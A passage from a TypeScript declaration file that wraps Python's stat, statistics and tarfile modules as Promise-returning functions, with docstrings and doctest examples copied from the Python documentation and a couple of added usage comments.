S_ISCHR$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a block special device file.\n\t */\n\tfunction S_ISBLK(mode): Promise<any>\n\tfunction S_ISBLK$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a regular file.\n\t */\n\tfunction S_ISREG(mode): Promise<any>\n\tfunction S_ISREG$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a FIFO (named pipe).\n\t */\n\tfunction S_ISFIFO(mode): Promise<any>\n\tfunction S_ISFIFO$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a symbolic link.\n\t */\n\tfunction S_ISLNK(mode): Promise<any>\n\tfunction S_ISLNK$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a socket.\n\t */\n\tfunction S_ISSOCK(mode): Promise<any>\n\tfunction S_ISSOCK$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a door.\n\t */\n\tfunction S_ISDOOR(mode): Promise<any>\n\tfunction S_ISDOOR$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from an event port.\n\t */\n\tfunction S_ISPORT(mode): Promise<any>\n\tfunction S_ISPORT$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a whiteout.\n\t */\n\tfunction S_ISWHT(mode): Promise<any>\n\tfunction S_ISWHT$({ mode }): Promise<any>\n\n\t/**\n\t * Convert a file's mode to a string of the form '-rwxrwxrwx'.\n\t */\n\tfunction filemode(mode): Promise<any>\n\tfunction filemode$({ mode }): Promise<any>\n\tlet ST_MODE: Promise<any>\n\tlet ST_INO: Promise<any>\n\tlet ST_DEV: Promise<any>\n\tlet ST_NLINK: Promise<any>\n\tlet ST_UID: Promise<any>\n\tlet ST_GID: Promise<any>\n\tlet ST_SIZE: Promise<any>\n\tlet ST_ATIME: Promise<any>\n\tlet ST_MTIME: Promise<any>\n\tlet ST_CTIME: Promise<any>\n\tlet S_IFDIR: Promise<any>\n\tlet S_IFCHR: Promise<any>\n\tlet S_IFBLK: Promise<any>\n\tlet S_IFREG: Promise<any>\n\tlet S_IFIFO: Promise<any>\n\tlet S_IFLNK: Promise<any>\n\tlet S_IFSOCK: Promise<any>\n\tlet S_IFDOOR: Promise<any>\n\tlet S_IFPORT: Promise<any>\n\tlet S_IFWHT: Promise<any>\n\tlet S_ISUID: Promise<any>\n\tlet S_ISGID: Promise<any>\n\tlet S_ENFMT: Promise<any>\n\tlet S_ISVTX: Promise<any>\n\tlet S_IREAD: Promise<any>\n\tlet S_IWRITE: Promise<any>\n\tlet S_IEXEC: Promise<any>\n\tlet S_IRWXU: Promise<any>\n\tlet S_IRUSR: Promise<any>\n\tlet S_IWUSR: Promise<any>\n\tlet S_IXUSR: Promise<any>\n\tlet S_IRWXG: Promise<any>\n\tlet S_IRGRP: Promise<any>\n\tlet S_IWGRP: Promise<any>\n\tlet S_IXGRP: Promise<any>\n\tlet S_IRWXO: Promise<any>\n\tlet S_IROTH: Promise<any>\n\tlet S_IWOTH: Promise<any>\n\tlet S_IXOTH: Promise<any>\n\tlet UF_NODUMP: Promise<any>\n\tlet UF_IMMUTABLE: Promise<any>\n\tlet UF_APPEND: Promise<any>\n\tlet UF_OPAQUE: Promise<any>\n\tlet UF_NOUNLINK: Promise<any>\n\tlet UF_COMPRESSED: Promise<any>\n\tlet UF_HIDDEN: Promise<any>\n\tlet SF_ARCHIVED: Promise<any>\n\tlet SF_IMMUTABLE: Promise<any>\n\tlet SF_APPEND: Promise<any>\n\tlet SF_NOUNLINK: Promise<any>\n\tlet SF_SNAPSHOT: Promise<any>\n\tlet FILE_ATTRIBUTE_ARCHIVE: Promise<any>\n\tlet FILE_ATTRIBUTE_COMPRESSED: Promise<any>\n\tlet FILE_ATTRIBUTE_DEVICE: Promise<any>\n\tlet FILE_ATTRIBUTE_DIRECTORY: Promise<any>\n\tlet FILE_ATTRIBUTE_ENCRYPTED: Promise<any>\n\tlet FILE_ATTRIBUTE_HIDDEN: Promise<any>\n\tlet FILE_ATTRIBUTE_INTEGRITY_STREAM: Promise<any>\n\tlet FILE_ATTRIBUTE_NORMAL: Promise<any>\n\tlet FILE_ATTRIBUTE_NOT_CONTENT_INDEXED: Promise<any>\n\tlet FILE_ATTRIBUTE_NO_SCRUB_DATA: Promise<any>\n\tlet FILE_ATTRIBUTE_OFFLINE: Promise<any>\n\tlet FILE_ATTRIBUTE_READONLY: Promise<any>\n\tlet FILE_ATTRIBUTE_REPARSE_POINT: 
Promise<any>\n\tlet FILE_ATTRIBUTE_SPARSE_FILE: Promise<any>\n\tlet FILE_ATTRIBUTE_SYSTEM: Promise<any>\n\tlet FILE_ATTRIBUTE_TEMPORARY: Promise<any>\n\tlet FILE_ATTRIBUTE_VIRTUAL: Promise<any>\n}\ndeclare module statistics {\n\tvar _\n\n\t/**\n\t * Return the sample arithmetic mean of data.\n\t * \n\t * >>> mean([1, 2, 3, 4, 4])\n\t * 2.8\n\t * \n\t * >>> from fractions import Fraction as F\n\t * >>> mean([F(3, 7), F(1, 21), F(5, 3), F(1, 3)])\n\t * Fraction(13, 21)\n\t * \n\t * >>> from decimal import Decimal as D\n\t * >>> mean([D(\"0.5\"), D(\"0.75\"), D(\"0.625\"), D(\"0.375\")])\n\t * Decimal('0.5625')\n\t * \n\t * If ``data`` is empty, StatisticsError will be raised.\n\t * \n\t */\n\tfunction mean(data): Promise<any>\n\tfunction mean$({ data }): Promise<any>\n\n\t/**\n\t * Convert data to floats and compute the arithmetic mean.\n\t * \n\t * This runs faster than the mean() function and it always returns a float.\n\t * If the input dataset is empty, it raises a StatisticsError.\n\t * \n\t * >>> fmean([3.5, 4.0, 5.25])\n\t * 4.25\n\t * \n\t */\n\tfunction fmean(data, weights?): Promise<any>\n\tfunction fmean$({ data, weights }: { data, weights?}): Promise<any>\n\n\t/**\n\t * Convert data to floats and compute the geometric mean.\n\t * \n\t * Raises a StatisticsError if the input dataset is empty,\n\t * if it contains a zero, or if it contains a negative value.\n\t * \n\t * No special efforts are made to achieve exact results.\n\t * (However, this may change in the future.)\n\t * \n\t * >>> round(geometric_mean([54, 24, 36]), 9)\n\t * 36.0\n\t * \n\t */\n\tfunction geometric_mean(data): Promise<any>\n\tfunction geometric_mean$({ data }): Promise<any>\n\n\t/**\n\t * Return the harmonic mean of data.\n\t * \n\t * The harmonic mean is the reciprocal of the arithmetic mean of the\n\t * reciprocals of the data. It can be used for averaging ratios or\n\t * rates, for example speeds.\n\t * \n\t * Suppose a car travels 40 km/hr for 5 km and then speeds-up to\n\t * 60 km/hr for another 5 km. What is the average speed?\n\t * \n\t * >>> harmonic_mean([40, 60])\n\t * 48.0\n\t * \n\t * Suppose a car travels 40 km/hr for 5 km, and when traffic clears,\n\t * speeds-up to 60 km/hr for the remaining 30 km of the journey. 
What\n\t * is the average speed?\n\t * \n\t * >>> harmonic_mean([40, 60], weights=[5, 30])\n\t * 56.0\n\t * \n\t * If ``data`` is empty, or any element is less than zero,\n\t * ``harmonic_mean`` will raise ``StatisticsError``.\n\t * \n\t */\n\tfunction harmonic_mean(data, weights?): Promise<any>\n\tfunction harmonic_mean$({ data, weights }: { data, weights?}): Promise<any>\n\n\t/**\n\t * Return the median (middle value) of numeric data.\n\t * \n\t * When the number of data points is odd, return the middle data point.\n\t * When the number of data points is even, the median is interpolated by\n\t * taking the average of the two middle values:\n\t * \n\t * >>> median([1, 3, 5])\n\t * 3\n\t * >>> median([1, 3, 5, 7])\n\t * 4.0\n\t * \n\t * \n\t */\n\tfunction median(data): Promise<any>\n\tfunction median$({ data }): Promise<any>\n\n\t/**\n\t * Return the low median of numeric data.\n\t * \n\t * When the number of data points is odd, the middle value is returned.\n\t * When it is even, the smaller of the two middle values is returned.\n\t * \n\t * >>> median_low([1, 3, 5])\n\t * 3\n\t * >>> median_low([1, 3, 5, 7])\n\t * 3\n\t * \n\t * \n\t */\n\tfunction median_low(data): Promise<any>\n\tfunction median_low$({ data }): Promise<any>\n\n\t/**\n\t * Return the high median of data.\n\t * \n\t * When the number of data points is odd, the middle value is returned.\n\t * When it is even, the larger of the two middle values is returned.\n\t * \n\t * >>> median_high([1, 3, 5])\n\t * 3\n\t * >>> median_high([1, 3, 5, 7])\n\t * 5\n\t * \n\t * \n\t */\n\tfunction median_high(data): Promise<any>\n\tfunction median_high$({ data }): Promise<any>\n\n\t/**\n\t * Return the 50th percentile (median) of grouped continuous data.\n\t * \n\t * >>> median_grouped([1, 2, 2, 3, 4, 4, 4, 4, 4, 5])\n\t * 3.7\n\t * >>> median_grouped([52, 52, 53, 54])\n\t * 52.5\n\t * \n\t * This calculates the median as the 50th percentile, and should be\n\t * used when your data is continuous and grouped. In the above example,\n\t * the values 1, 2, 3, etc. actually represent the midpoint of classes\n\t * 0.5-1.5, 1.5-2.5, 2.5-3.5, etc. The middle value falls somewhere in\n\t * class 3.5-4.5, and interpolation is used to estimate it.\n\t * \n\t * Optional argument ``interval`` represents the class interval, and\n\t * defaults to 1. Changing the class interval naturally will change the\n\t * interpolated 50th percentile value:\n\t * \n\t * >>> median_grouped([1, 3, 3, 5, 7], interval=1)\n\t * 3.25\n\t * >>> median_grouped([1, 3, 3, 5, 7], interval=2)\n\t * 3.5\n\t * \n\t * This function does not check whether the data points are at least\n\t * ``interval`` apart.\n\t * \n\t */\n\tfunction median_grouped(data, interval?): Promise<any>\n\tfunction median_grouped$({ data, interval }: { data, interval?}): Promise<any>\n\n\t/**\n\t * Return the most common data point from discrete or nominal data.\n\t * \n\t * ``mode`` assumes discrete data, and returns a single value. 
This is the\n\t * standard treatment of the mode as commonly taught in schools:\n\t * \n\t * >>> mode([1, 1, 2, 3, 3, 3, 3, 4])\n\t * 3\n\t * \n\t * This also works with nominal (non-numeric) data:\n\t * \n\t * >>> mode([\"red\", \"blue\", \"blue\", \"red\", \"green\", \"red\", \"red\"])\n\t * 'red'\n\t * \n\t * If there are multiple modes with the same frequency, return the first one\n\t * encountered:\n\t * \n\t * >>> mode(['red', 'red', 'green', 'blue', 'blue'])\n\t * 'red'\n\t * \n\t * If *data* is empty, ``mode`` raises StatisticsError.\n\t * \n\t * \n\t */\n\tfunction mode(data): Promise<any>\n\tfunction mode$({ data }): Promise<any>\n\n\t/**\n\t * Return a list of the most frequently occurring values.\n\t * \n\t * Will return more than one result if there are multiple modes\n\t * or an empty list if *data* is empty.\n\t * \n\t * >>> multimode('aabbbbbbbbcc')\n\t * ['b']\n\t * >>> multimode('aabbbbccddddeeffffgg')\n\t * ['b', 'd', 'f']\n\t * >>> multimode('')\n\t * []\n\t * \n\t */\n\tfunction multimode(data): Promise<any>\n\tfunction multimode$({ data }): Promise<any>\n\n\t/**\n\t * Divide *data* into *n* continuous intervals with equal probability.\n\t * \n\t * Returns a list of (n - 1) cut points separating the intervals.\n\t * \n\t * Set *n* to 4 for quartiles (the default). Set *n* to 10 for deciles.\n\t * Set *n* to 100 for percentiles, which gives the 99 cut points that\n\t * separate *data* into 100 equal-sized groups.\n\t * \n\t * The *data* can be any iterable containing sample data.\n\t * The cut points are linearly interpolated between data points.\n\t * \n\t * If *method* is set to *inclusive*, *data* is treated as population\n\t * data. The minimum value is treated as the 0th percentile and the\n\t * maximum value is treated as the 100th percentile.\n\t * \n\t */\n\tfunction quantiles(data): Promise<any>\n\tfunction quantiles$({ data }): Promise<any>\n\n\t/**\n\t * Return the sample variance of data.\n\t * \n\t * data should be an iterable of Real-valued numbers, with at least two\n\t * values. The optional argument xbar, if given, should be the mean of\n\t * the data. If it is missing or None, the mean is automatically calculated.\n\t * \n\t * Use this function when your data is a sample from a population. To\n\t * calculate the variance from the entire population, see ``pvariance``.\n\t * \n\t * Examples:\n\t * \n\t * >>> data = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5]\n\t * >>> variance(data)\n\t * 1.3720238095238095\n\t * \n\t * If you have already calculated the mean of your data, you can pass it as\n\t * the optional second argument ``xbar`` to avoid recalculating it:\n\t * \n\t * >>> m = mean(data)\n\t * >>> variance(data, m)\n\t * 1.3720238095238095\n\t * \n\t * This function does not check that ``xbar`` is actually the mean of\n\t * ``data``. Giving arbitrary values for ``xbar`` may lead to invalid or\n\t * impossible results.\n\t * \n\t * Decimals and Fractions are supported:\n\t * \n\t * >>> from decimal import Decimal as D\n\t * >>> variance([D(\"27.5\"), D(\"30.25\"), D(\"30.25\"), D(\"34.5\"), D(\"41.75\")])\n\t * Decimal('31.01875')\n\t * \n\t * >>> from fractions import Fraction as F\n\t * >>> variance([F(1, 6), F(1, 2), F(5, 3)])\n\t * Fraction(67, 108)\n\t * \n\t * \n\t */\n\tfunction variance(data, xbar?): Promise<any>\n\tfunction variance$({ data, xbar }: { data, xbar?}): Promise<any>
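\n\n\t// Example (added): a hedged usage sketch of the wrappers above. It assumes a\n\t// runtime bridge that resolves each declared function to its Python result;\n\t// the variable names are illustrative only.\n\t//\n\t//   const data = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5]\n\t//   const m = await statistics.mean(data)          // 1.6071428571428572\n\t//   const v = await statistics.variance(data, m)   // 1.3720238095238095\n\t//   const cuts = await statistics.quantiles(data)  // three quartile cut points\n\n\t/**\n\t * Return the population variance of ``data``.\n\t * \n\t * data should be a sequence or iterable of Real-valued numbers, with at least one\n\t * value. 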
The optional argument mu, if given, should be the mean of\n\t * the data. If it is missing or None, the mean is automatically calculated.\n\t * \n\t * Use this function to calculate the variance from the entire population.\n\t * To estimate the variance from a sample, the ``variance`` function is\n\t * usually a better choice.\n\t * \n\t * Examples:\n\t * \n\t * >>> data = [0.0, 0.25, 0.25, 1.25, 1.5, 1.75, 2.75, 3.25]\n\t * >>> pvariance(data)\n\t * 1.25\n\t * \n\t * If you have already calculated the mean of the data, you can pass it as\n\t * the optional second argument to avoid recalculating it:\n\t * \n\t * >>> mu = mean(data)\n\t * >>> pvariance(data, mu)\n\t * 1.25\n\t * \n\t * Decimals and Fractions are supported:\n\t * \n\t * >>> from decimal import Decimal as D\n\t * >>> pvariance([D(\"27.5\"), D(\"30.25\"), D(\"30.25\"), D(\"34.5\"), D(\"41.75\")])\n\t * Decimal('24.815')\n\t * \n\t * >>> from fractions import Fraction as F\n\t * >>> pvariance([F(1, 4), F(5, 4), F(1, 2)])\n\t * Fraction(13, 72)\n\t * \n\t * \n\t */\n\tfunction pvariance(data, mu?): Promise<any>\n\tfunction pvariance$({ data, mu }: { data, mu?}): Promise<any>\n\n\t/**\n\t * Return the square root of the sample variance.\n\t * \n\t * See ``variance`` for arguments and other details.\n\t * \n\t * >>> stdev([1.5, 2.5, 2.5, 2.75, 3.25, 4.75])\n\t * 1.0810874155219827\n\t * \n\t * \n\t */\n\tfunction stdev(data, xbar?): Promise<any>\n\tfunction stdev$({ data, xbar }: { data, xbar?}): Promise<any>\n\n\t/**\n\t * Return the square root of the population variance.\n\t * \n\t * See ``pvariance`` for arguments and other details.\n\t * \n\t * >>> pstdev([1.5, 2.5, 2.5, 2.75, 3.25, 4.75])\n\t * 0.986893273527251\n\t * \n\t * \n\t */\n\tfunction pstdev(data, mu?): Promise<any>\n\tfunction pstdev$({ data, mu }: { data, mu?}): Promise<any>\n\n\t/**\n\t * Covariance\n\t * \n\t * Return the sample covariance of two inputs *x* and *y*. Covariance\n\t * is a measure of the joint variability of two inputs.\n\t * \n\t * >>> x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\t * >>> y = [1, 2, 3, 1, 2, 3, 1, 2, 3]\n\t * >>> covariance(x, y)\n\t * 0.75\n\t * >>> z = [9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t * >>> covariance(x, z)\n\t * -7.5\n\t * >>> covariance(z, x)\n\t * -7.5\n\t * \n\t * \n\t */\n\tfunction covariance(x, y): Promise<any>\n\tfunction covariance$({ x, y }): Promise<any>\n\n\t/**\n\t * Pearson's correlation coefficient\n\t * \n\t * Return the Pearson's correlation coefficient for two inputs. Pearson's\n\t * correlation coefficient *r* takes values between -1 and +1. It measures the\n\t * strength and direction of the linear relationship, where +1 means very\n\t * strong, positive linear relationship, -1 very strong, negative linear\n\t * relationship, and 0 no linear relationship.\n\t * \n\t * >>> x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\t * >>> y = [9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t * >>> correlation(x, x)\n\t * 1.0\n\t * >>> correlation(x, y)\n\t * -1.0\n\t * \n\t * \n\t */\n\tfunction correlation(x, y): Promise<any>\n\tfunction correlation$({ x, y }): Promise<any>\n\n\t/**\n\t * Slope and intercept for simple linear regression.\n\t * \n\t * Return the slope and intercept of simple linear regression\n\t * parameters estimated using ordinary least squares. 
Simple linear\n\t * regression describes the relationship between an independent variable\n\t * *x* and a dependent variable *y* in terms of a linear function:\n\t * \n\t * y = slope * x + intercept + noise\n\t * \n\t * where *slope* and *intercept* are the regression parameters that are\n\t * estimated, and noise represents the variability of the data that was\n\t * not explained by the linear regression (it is equal to the\n\t * difference between predicted and actual values of the dependent\n\t * variable).\n\t * \n\t * The parameters are returned as a named tuple.\n\t * \n\t * >>> x = [1, 2, 3, 4, 5]\n\t * >>> noise = NormalDist().samples(5, seed=42)\n\t * >>> y = [3 * x[i] + 2 + noise[i] for i in range(5)]\n\t * >>> linear_regression(x, y) #doctest: +ELLIPSIS\n\t * LinearRegression(slope=3.09078914170..., intercept=1.75684970486...)\n\t * \n\t * \n\t */\n\tfunction linear_regression(x, y): Promise<any>\n\tfunction linear_regression$({ x, y }): Promise<any>\n\tinterface IStatisticsError {\n\t}\n\n\t/**\n\t * Normal distribution of a random variable\n\t */\n\n\t/**\n\t * NormalDist where mu is the mean and sigma is the standard deviation.\n\t */\n\tfunction NormalDist(mu?, sigma?): Promise<INormalDist>\n\tfunction NormalDist$({ mu, sigma }: { mu?, sigma?}): Promise<INormalDist>\n\tinterface INormalDist {\n\n\t\t/**\n\t\t * Make a normal distribution instance from sample data.\n\t\t */\n\t\tfrom_samples(data): Promise<any>\n\t\tfrom_samples$({ data }): Promise<any>\n\n\t\t/**\n\t\t * Generate *n* samples for a given mean and standard deviation.\n\t\t */\n\t\tsamples(n): Promise<any>\n\t\tsamples$({ n }): Promise<any>\n\n\t\t/**\n\t\t * Probability density function. P(x <= X < x+dx) / dx\n\t\t */\n\t\tpdf(x): Promise<any>\n\t\tpdf$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Cumulative distribution function. P(X <= x)\n\t\t */\n\t\tcdf(x): Promise<any>\n\t\tcdf$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Inverse cumulative distribution function. x : P(X <= x) = p\n\t\t * \n\t\t * Finds the value of the random variable such that the probability of\n\t\t * the variable being less than or equal to that value equals the given\n\t\t * probability.\n\t\t * \n\t\t * This function is also called the percent point function or quantile\n\t\t * function.\n\t\t * \n\t\t */\n\t\tinv_cdf(p): Promise<any>\n\t\tinv_cdf$({ p }): Promise<any>\n\n\t\t/**\n\t\t * Divide into *n* continuous intervals with equal probability.\n\t\t * \n\t\t * Returns a list of (n - 1) cut points separating the intervals.\n\t\t * \n\t\t * Set *n* to 4 for quartiles (the default). Set *n* to 10 for deciles.\n\t\t * Set *n* to 100 for percentiles, which gives the 99 cut points that\n\t\t * separate the normal distribution into 100 equal-sized groups.\n\t\t * \n\t\t */\n\t\tquantiles(n?): Promise<any>\n\t\tquantiles$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Compute the overlapping coefficient (OVL) between two normal distributions.\n\t\t * \n\t\t * Measures the agreement between two normal probability distributions.\n\t\t * Returns a value between 0.0 and 1.0 giving the overlapping area in\n\t\t * the two underlying probability density functions.\n\t\t * \n\t\t * >>> N1 = NormalDist(2.4, 1.6)\n\t\t * >>> N2 = NormalDist(3.2, 2.0)\n\t\t * >>> N1.overlap(N2)\n\t\t * 0.8035050657330205\n\t\t * \n\t\t */\n\t\toverlap(other): Promise<any>\n\t\toverlap$({ other }): Promise<any>\n\n\t\t/**\n\t\t * Compute the Standard Score. 
(x - mean) / stdev\n\t\t * \n\t\t * Describes *x* in terms of the number of standard deviations\n\t\t * above or below the mean of the normal distribution.\n\t\t * \n\t\t */\n\t\tzscore(x): Promise<any>\n\t\tzscore$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Arithmetic mean of the normal distribution.\n\t\t */\n\t\tmean(): Promise<any>\n\t\tmean$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the median of the normal distribution.\n\t\t */\n\t\tmedian(): Promise<any>\n\t\tmedian$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the mode of the normal distribution.\n\t\t * \n\t\t * The mode is the value x at which the probability density\n\t\t * function (pdf) takes its maximum value.\n\t\t * \n\t\t */\n\t\tmode(): Promise<any>\n\t\tmode$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Standard deviation of the normal distribution.\n\t\t */\n\t\tstdev(): Promise<any>\n\t\tstdev$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Square of the standard deviation.\n\t\t */\n\t\tvariance(): Promise<any>\n\t\tvariance$($: {}): Promise<any>\n\t}\n\tlet LinearRegression: Promise<any>\n}
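\n\n// Example (added): a hedged sketch of the INormalDist wrappers declared above;\n// the numbers mirror the overlap() docstring, and the await-based bridge\n// semantics are an assumption of this sketch.\n//\n//   const n1 = await statistics.NormalDist(2.4, 1.6)\n//   const n2 = await statistics.NormalDist(3.2, 2.0)\n//   await n1.overlap(n2)   // 0.8035050657330205\n//   await n1.cdf(2.4)      // 0.5, since half the mass lies below the mean\n\ndeclare module tarfile {\n\tvar _\n\n\t/**\n\t * Convert a string to a null-terminated bytes object.\n\t * \n\t */\n\tfunction stn(s, length, encoding, errors): Promise<any>\n\tfunction stn$({ s, length, encoding, errors }): Promise<any>\n\n\t/**\n\t * Convert a null-terminated bytes object to a string.\n\t * \n\t */\n\tfunction nts(s, encoding, errors): Promise<any>\n\tfunction nts$({ s, encoding, errors }): Promise<any>\n\n\t/**\n\t * Convert a number field to a python number.\n\t * \n\t */\n\tfunction nti(s): Promise<any>\n\tfunction nti$({ s }): Promise<any>\n\n\t/**\n\t * Convert a python number to a number field.\n\t * \n\t */\n\tfunction itn(n, digits?, format?): Promise<any>\n\tfunction itn$({ n, digits, format }: { n, digits?, format?}): Promise<any>\n\n\t/**\n\t * Calculate the checksum for a member's header by summing up all\n\t * characters except for the chksum field which is treated as if\n\t * it was filled with spaces. According to the GNU tar sources,\n\t * some tars (Sun and NeXT) calculate chksum with signed char,\n\t * which will be different if there are chars in the buffer with\n\t * the high bit set. 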
So we calculate two checksums, unsigned and\n\t * signed.\n\t * \n\t */\n\tfunction calc_chksums(buf): Promise<any>\n\tfunction calc_chksums$({ buf }): Promise<any>\n\n\t/**\n\t * Copy length bytes from fileobj src to fileobj dst.\n\t * If length is None, copy the entire content.\n\t * \n\t */\n\tfunction copyfileobj(src, dst, length?, exception?, bufsize?): Promise<any>\n\tfunction copyfileobj$({ src, dst, length, exception, bufsize }: { src, dst, length?, exception?, bufsize?}): Promise<any>\n\n\t/**\n\t * Return True if name points to a tar archive that we\n\t * are able to handle, else return False.\n\t * \n\t * 'name' should be a string, file, or file-like object.\n\t * \n\t */\n\tfunction is_tarfile(name): Promise<any>\n\tfunction is_tarfile$({ name }): Promise<any>\n\tfunction main(): Promise<any>\n\tfunction main$($: {}): Promise<any>\n\n\t/**\n\t * Base exception.\n\t */\n\tinterface ITarError {\n\t}\n\n\t/**\n\t * General exception for extract errors.\n\t */\n\tinterface IExtractError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for unreadable tar archives.\n\t */\n\tinterface IReadError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for unavailable compression methods.\n\t */\n\tinterface ICompressionError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for unsupported operations on stream-like TarFiles.\n\t */\n\tinterface IStreamError extends ITarError {\n\t}\n\n\t/**\n\t * Base exception for header errors.\n\t */\n\tinterface IHeaderError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for empty headers.\n\t */\n\tinterface IEmptyHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for truncated headers.\n\t */\n\tinterface ITruncatedHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for end of file headers.\n\t */\n\tinterface IEOFHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for invalid headers.\n\t */\n\tinterface IInvalidHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for missing and invalid extended headers.\n\t */\n\tinterface ISubsequentHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Low-level file object. Supports reading and writing.\n\t * It is used instead of a regular file object for streaming\n\t * access.\n\t * \n\t */\n\tinterface I_LowLevelFile {\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t\twrite(s): Promise<any>\n\t\twrite$({ s }): Promise<any>\n\t}\n\n\t/**\n\t * Class that serves as an adapter between TarFile and\n\t * a stream-like object. The stream-like object only\n\t * needs to have a read() or write() method and is accessed\n\t * blockwise. Use of gzip or bzip2 compression is possible.\n\t * A stream-like object could be for example: sys.stdin,\n\t * sys.stdout, a socket, a tape device etc.\n\t * \n\t * _Stream is intended to be used only internally.\n\t * \n\t */\n\tinterface I_Stream {\n\n\t\t/**\n\t\t * Write string s to the stream.\n\t\t * \n\t\t */\n\t\twrite(s): Promise<any>\n\t\twrite$({ s }): Promise<any>\n\n\t\t/**\n\t\t * Close the _Stream object. No operation should be\n\t\t * done on it afterwards.\n\t\t * \n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the stream's file pointer position.\n\t\t * \n\t\t */\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the stream's file pointer to pos. 
Negative seeking\n\t\t * is forbidden.\n\t\t * \n\t\t */\n\t\tseek(pos?): Promise<any>\n\t\tseek$({ pos }: { pos?}): Promise<any>\n\n\t\t/**\n\t\t * Return the next size number of bytes from the stream.\n\t\t */\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t}\n\n\t/**\n\t * Small proxy class that enables transparent compression\n\t * detection for the Stream interface (mode 'r|*').\n\t * \n\t */\n\tinterface I_StreamProxy {\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t\tgetcomptype(): Promise<any>\n\t\tgetcomptype$($: {}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * A thin wrapper around an existing file object that\n\t * provides a part of its data as an individual file\n\t * object.\n\t * \n\t */\n\tinterface I_FileInFile {\n\t\tflush(): Promise<any>\n\t\tflush$($: {}): Promise<any>\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the current file position.\n\t\t * \n\t\t */\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Seek to a position in the file.\n\t\t * \n\t\t */\n\t\tseek(position, whence?): Promise<any>\n\t\tseek$({ position, whence }: { position, whence?}): Promise<any>\n\n\t\t/**\n\t\t * Read data from the file.\n\t\t * \n\t\t */\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t\treadinto(b): Promise<any>\n\t\treadinto$({ b }): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tfunction ExFileObject(tarfile, tarinfo): Promise<IExFileObject>\n\tfunction ExFileObject$({ tarfile, tarinfo }): Promise<IExFileObject>\n\tinterface IExFileObject {\n\t}\n\n\t/**\n\t * Informational class which holds the details about an\n\t * archive member given by a tar header block.\n\t * TarInfo objects are returned by TarFile.getmember(),\n\t * TarFile.getmembers() and TarFile.gettarinfo() and are\n\t * usually created internally.\n\t * \n\t */\n\n\t/**\n\t * Construct a TarInfo object. 
name is the optional name\n\t * of the member.\n\t * \n\t */\n\tfunction TarInfo(name?): Promise<ITarInfo>\n\tfunction TarInfo$({ name }: { name?}): Promise<ITarInfo>\n\tinterface ITarInfo {\n\n\t\t/**\n\t\t * In pax headers, \"name\" is called \"path\".\n\t\t */\n\t\tpath(): Promise<any>\n\t\tpath$($: {}): Promise<any>\n\t\tpath(name): Promise<any>\n\t\tpath$({ name }): Promise<any>\n\n\t\t/**\n\t\t * In pax headers, \"linkname\" is called \"linkpath\".\n\t\t */\n\t\tlinkpath(): Promise<any>\n\t\tlinkpath$($: {}): Promise<any>\n\t\tlinkpath(linkname): Promise<any>\n\t\tlinkpath$({ linkname }): Promise<any>\n\n\t\t/**\n\t\t * Return the TarInfo's attributes as a dictionary.\n\t\t * \n\t\t */\n\t\tget_info(): Promise<any>\n\t\tget_info$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a tar header as a string of 512 byte blocks.\n\t\t * \n\t\t */\n\t\ttobuf(format?, encoding?, errors?): Promise<any>\n\t\ttobuf$({ format, encoding, errors }: { format?, encoding?, errors?}): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a ustar header block.\n\t\t * \n\t\t */\n\t\tcreate_ustar_header(info, encoding, errors): Promise<any>\n\t\tcreate_ustar_header$({ info, encoding, errors }): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a GNU header block sequence.\n\t\t * \n\t\t */\n\t\tcreate_gnu_header(info, encoding, errors): Promise<any>\n\t\tcreate_gnu_header$({ info, encoding, errors }): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a ustar header block. If it cannot 